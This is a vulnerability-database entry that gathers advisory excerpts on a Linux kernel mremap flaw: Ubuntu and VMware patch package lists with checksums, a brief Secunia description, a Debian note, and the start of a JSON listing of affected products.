http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   784762 523b94315bff20137df79c5308abd5b7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 24820746 adc5365726ba88565ad89953707bd012
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb
  Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210242 78939115c860efacb83481c0687f1a7a
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   131610 dc5625deacbac446e71517f5902376b1
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     5852 f049a9332d469b247e451868b4f22cce
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    27228 0b5b4529d140289e616bded832055cbc
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     8538 9010c080bd63660bf529930565d49f62
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58830 ae6573a0664b5486360156dd6711776c
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   139430 14f825a3334b18614059312527002767
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    70106 6dde178febff58a546142209374e1616
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5:   601506 1b56c59b3df953a640760b876d752465
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5:   600680 166e5056f971d5fa031230c1af67d028
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb
  Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   121954 75090ea655204cc898db4634fc8aa021
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   120960 8f63ad112de0797974650631dee53d13
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   184674 d704744a26941df63b9195288306fa7b

.

ESXi 4.1


ESXi410-201010401-SG Download link: http://bit.ly/bb3xjV md5sum: 05f1049c7a595481cd682e92fe8d3285 sha1sum: f6993c185f7d1cb971a4ae6e017e0246b8c25a76 http://kb.vmware.com/kb/1027753

ESX 4.1


ESX410-201010001 Download link: http://bit.ly/a3Ffw8 md5sum: ff4435fd3c74764f064e047c6e5e7809 sha1sum: 322981f4dbb9e5913c8f38684369444ff7e265b3 http://kb.vmware.com/kb/1027027

ESX410-201010001 contains the following security bulletins: ESX410-201010401-SG (COS kernel) | http://kb.vmware.com/kb/1027013 ESX410-201010419-SG (Likewise) | http://kb.vmware.com/kb/1027026 ESX410-201010404-SG (NSS) | http://kb.vmware.com/kb/1027016 ESX410-201010409-SG (tar) | http://kb.vmware.com/kb/1027019 ESX410-201010412-SG (Perl) | http://kb.vmware.com/kb/1027022 ESX410-201010413-SG (cpio) | http://kb.vmware.com/kb/1027023 ESX410-201010410-SG (cURL) | http://kb.vmware.com/kb/1027020 ESX410-201010401-SG (vmkernel64, VMX, CIM)| http://kb.vmware.com/kb/1027013 ESX410-201010414-SG (vmware-esx-pam-config)| http://kb.vmware.com/kb/1027024 ESX410-201010402-SG (GnuTLS, NSS, and openSSL)| http://kb.vmware.com/kb/1027014

ESX410-201010001 also contains the following non-security bulletins ESX410-201010405-BG ESX410-201010415-BG

To install an individual bulletin use esxupdate with the -b option.

The vulnerabilities are caused due to various problems related to "do_mremap()" and "MREMAP_FIXED", which can be exploited to e.g. cause a system crash on certain architectures.

PROVIDED AND/OR DISCOVERED BY: Disclosed in GIT commits.

ORIGINAL ADVISORY: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.32.4


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


.

Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201001-0654",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.x"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.29.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
